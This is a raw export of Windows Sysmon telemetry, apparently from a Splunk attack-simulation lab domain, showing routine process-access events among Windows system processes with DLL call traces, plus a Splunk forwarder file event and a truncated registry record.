08:07:41.727{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F84C-60EB-EF7D-00000000CF01}7836C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001054619Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:41.727{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001054618Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:41.727{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001054617Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:41.726{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001054616Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:41.726{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001054615Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:41.726{466BC892-32D3-60E8-700B-00000000CF01}166410132C:\Windows\System32\sihost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+37dac|C:\Windows\System32\modernexecserver.dll+37d4f|C:\Windows\System32\modernexecserver.dll+375a6|C:\Windows\System32\modernexecserver.dll+1a1c4|C:\Windows\System32\modernexecserver.dll+3191d|C:\Windows\System32\modernexecserver.dll+32871|C:\Windows\System32\modernexecserver.dll+3278f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054614Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:41.547{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001054613Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:41.547{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F84C-60EB-EF7D-00000000CF01}7836C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001054612Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:41.547{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001054611Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:41.547{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001054610Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:41.547{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001054609Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:41.547{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001054608Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:41.093{466BC892-32D3-60E8-700B-00000000CF01}166410132C:\Windows\System32\sihost.exe{466BC892-F84C-60EB-EF7D-00000000CF01}7836C:\Windows\system32\backgroundTaskHost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\twinui.appcore.dll+684b|C:\Windows\System32\twinui.appcore.dll+756d|C:\Windows\system32\activationmanager.dll+b93d|C:\Windows\System32\twinui.appcore.dll+3df1|C:\Windows\SYSTEM32\twinapi.appcore.dll+2accd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001054607Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:41.093{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-F84C-60EB-EF7D-00000000CF01}7836C:\Windows\system32\backgroundTaskHost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|c:\windows\system32\bisrv.dll+1d9ff|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001054606Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:41.078{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F84C-60EB-EF7D-00000000CF01}7836C:\Windows\system32\backgroundTaskHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054605Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:41.078{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F84C-60EB-EF7D-00000000CF01}7836C:\Windows\system32\backgroundTaskHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054604Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:41.047{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-F84C-60EB-EF7D-00000000CF01}7836C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054603Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:41.047{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-F84C-60EB-EF7D-00000000CF01}7836C:\Windows\system32\backgroundTaskHost.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|c:\windows\system32\psmsrv.dll+e342|c:\windows\system32\psmsrv.dll+eb86|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054602Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:40.994{466BC892-32CD-60E8-670B-00000000CF01}45164260C:\Windows\system32\csrss.exe{466BC892-F84C-60EB-EF7D-00000000CF01}7836C:\Windows\system32\backgroundTaskHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054601Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:40.994{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F84C-60EB-EF7D-00000000CF01}7836C:\Windows\system32\backgroundTaskHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054600Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:40.994{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F84C-60EB-EF7D-00000000CF01}7836C:\Windows\system32\backgroundTaskHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+36dd2|c:\windows\system32\rpcss.dll+4401|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000810386Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:42.111{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65A3BBE611EAAB47E95C07F06E31F55F,SHA256=E28C0009A8250E0929406A5EE26BC29D8DF9A16BA0A93678C42CB5937524CD39,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001054652Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 